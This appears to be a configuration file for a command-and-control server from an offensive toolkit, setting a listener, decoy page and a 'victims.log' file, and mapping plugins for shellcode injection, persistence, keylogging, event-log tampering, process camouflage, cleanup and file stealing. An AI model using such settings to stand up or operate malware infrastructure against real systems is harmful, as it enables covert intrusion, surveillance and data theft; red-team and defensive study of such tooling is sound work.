#C2 (Command And Control) Settings
#=================================
[C2]

#Listening IP
IP = 127.0.0.1

#Listening Port
PORT = 8080 

#Clear Screen? TRUE/FALSE
CLEARSCR = FALSE

#Load Banner? TRUE/FALSE
BANNER = TRUE

#Decoy Page
DECOY_PAGE = pages//decoy.html

#OPSEC Attribute TRUE/FALSE
OPSEC_SAFETY = TRUE

#Plugins Folder Path (Dont Change IT!)
PLUGINS_PATH = plugins

#Pellets Folder Path (Dont Change IT!)
PELLETS_PATH  = pellets

#Collect Logs of actions results in a log file? TRUE/FALSE
COLLECT_LOG = TRUE

#Log File Patgh+Name
LOG_FILE = c2_temp//victims.log

#Decoy server name.
SRV_TYPE = APT32 Joke lol


#Plugins Settings
#================
[Plugins]

#Shellcode inject Plugin Name
injShellcode = dante.f

#Persistence Plugin Name
persistence = chillinside.f 

#Socks5 Plugin Name
selfSocks5 = burguler.f

#Local Recon plugin Name. there are 2 plugins. names must be separated with a ","
VerboseRecon= docheckup.f,docitup.f

#Shell Command Plugin
shell = visit.f

#DLL/EXE Loader
Load = opendoors.f

#ETW
ETW = ripper.f

#WNF7
WNF = colors.f

#EVTX
EVTX = whoshe.f

#CLEAN-UP
CLEANUP = hmbye.f

#KEYLOGGER
Keylogger= footsteps.f

#Process Camouflage
ProcessCamouflage=dressup.f

#File Grabber/Fetcher
FetchFile=givemeall.f

#Plugins utils/Bins/default configs (Dont Change it)
#===============
[Pellets]

#Loader's Stager for loading stub from NamedPipe
LoaderStager= taurus.j

#Pellet/Loader for persistence
LoaderPersistence = roze.j

#Shellcode Inject Pellet
LoaderShellcode = cos.j

#Keylogger Pellet
KeyloggerPellet = toz.j

#File Grabber/Stealer Pellet
FetchFilePellet = yoz.j

#Virustotal related config
#=========================
[VirusTotal]
#API Key for VT. Remember You dont need Premium/Intel Account for this, a normal account is enough
#you just need API key
#Option : Key Or NONE
VTkey = NONE


#Flask Settings
#==============
[FLASK]

#Debug print errors HTTP Server
DEBUG_SRV = TRUE

#Strict redirect - Avoiding 308 error
STRICT_REDIRECT = False

#Merge Slashes allows to harden against LFI/RFI/Info Disclosure type of vulnerabilities
MERGE_SLASHES = False
